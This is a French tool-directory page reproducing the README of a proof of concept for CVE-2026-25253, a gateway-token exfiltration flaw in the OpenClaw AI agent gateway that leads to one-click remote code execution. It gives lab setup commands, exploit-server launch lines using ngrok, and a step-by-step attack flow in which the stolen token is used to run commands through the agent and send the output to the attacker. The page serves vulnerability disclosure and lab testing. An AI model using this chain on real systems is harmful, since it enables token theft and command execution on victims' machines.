Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25253 — OpenClaw Authentication Token Exfiltration | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2026-25253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw Authentication Token Exfiltration

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25253 OpenClaw 1-Click RCE

★ CVE-2026-25253 OpenClaw 1-Click Exécution de Code à Distance PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Description

CVE-2026-25253 : Vulnérabilité d'exfiltration de jeton d'authentification OpenClaw

description: OpenClaw (également connu sous le nom de clawdbot ou Moltbot) avant la version v2026.1.29 permet aux attaquants d'exfiltrer un jeton d'authentification de passerelle stocké en fournissant une valeur gatewayUrl construite dans la chaîne de requête de l'interface de contrôle, qui établit automatiquement une connexion WebSocket sans validation ni confirmation de l'utilisateur. Cela peut conduire à un accès non autorisé à la passerelle et à une exécution de code à distance en un clic.

Prérequis

  • Docker (Docker Desktop sous Windows)
  • Python 3.x (côté attaquant)

Fichiers

  • Dockerfile — construire l'environnement vulnérable OpenClaw
  • templates/ — pages web malveillantes utilisées par l'exploit
  • config.txt — configuration OpenClaw utilisée dans l'environnement victime
  • exploit.py — serveur d'exploit
  • requirements.txt — dépendances du PoC

Configuration de l'environnement

  1. Construire l'image Docker
root@kitploit:~
docker build -t openclaw-vuln .
  1. Lancer l'environnement (Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Créer un tunnel SSH
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Mot de passe : openclawlab
  1. Accéder à l'interface de contrôle OpenClaw Ouvrir l'URL suivante dans le navigateur
root@kitploit:~
http://127.0.0.1:18789/
  1. Saisir le jeton de passerelle d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Cliquer sur Connect
  3. Ouvrir l'onglet Config
  4. Coller le contenu de config.txt
  5. Remplacer le champ de clé API par votre clé API OpenAI
  6. Enregistrer la configuration
  7. Confirmer que l'agent répond normalement

Preuve de concept (PoC)

  1. Installer les dépendances (côté attaquant)
root@kitploit:~
pip3 install -r requirements.txt
  1. Exposer le serveur d'exploit via HTTPS
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copier le nom d'hôte de transfert généré
  1. Lancer le serveur d'exploit
root@kitploit:~
python3 exploit.py --host VOTRE_NOM_DE_HOST_NGROK --command "env"

Exemple :

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Déclencher l'attaque
  1. Ouvrir la page malveillante exposée par le serveur d'exploit
  2. Simuler l'interaction de la victime avec la page
  3. Déclencher le flux d'exploit depuis le navigateur

Flux d'attaque

  1. Une URL malveillante modifie le gatewayUrl de l'interface de contrôle de la victime
  2. Le navigateur se connecte automatiquement au point de terminaison WebSocket contrôlé par l'attaquant
  3. Le jeton d'authentification de la passerelle est divulgué à l'attaquant
  4. La page malveillante utilise le jeton volé pour ouvrir une nouvelle connexion WebSocket vers la passerelle OpenClaw locale de la victime
  5. Une demande d'exécution de commande est envoyée via l'agent
  6. Le résultat de l'exécution est renvoyé au serveur de l'attaquant

Résultat attendu

  • Le navigateur de la victime est redirigé vers le flux WebSocket malveillant
  • Le jeton d'authentification de la passerelle est capturé par l'attaquant
  • L'attaquant peut envoyer une demande d'exécution de commande via OpenClaw
  • La sortie de la commande est renvoyée au serveur de l'attaquant

Exemple de sortie

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Remarques

  • Ce PoC cible OpenClaw 2026.1.24-1
  • La chaîne d'exploitation repose sur la gestion vulnérable de gatewayUrl dans l'interface de contrôle
  • Pour un accès distant à la victime, la page malveillante doit être servie via HTTPS
  • La passerelle OpenClaw locale est atteinte via le navigateur de la victime comme pont

EQST Insight

Nous publions une analyse de CVE et de logiciels malveillants une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Télécharger l’outil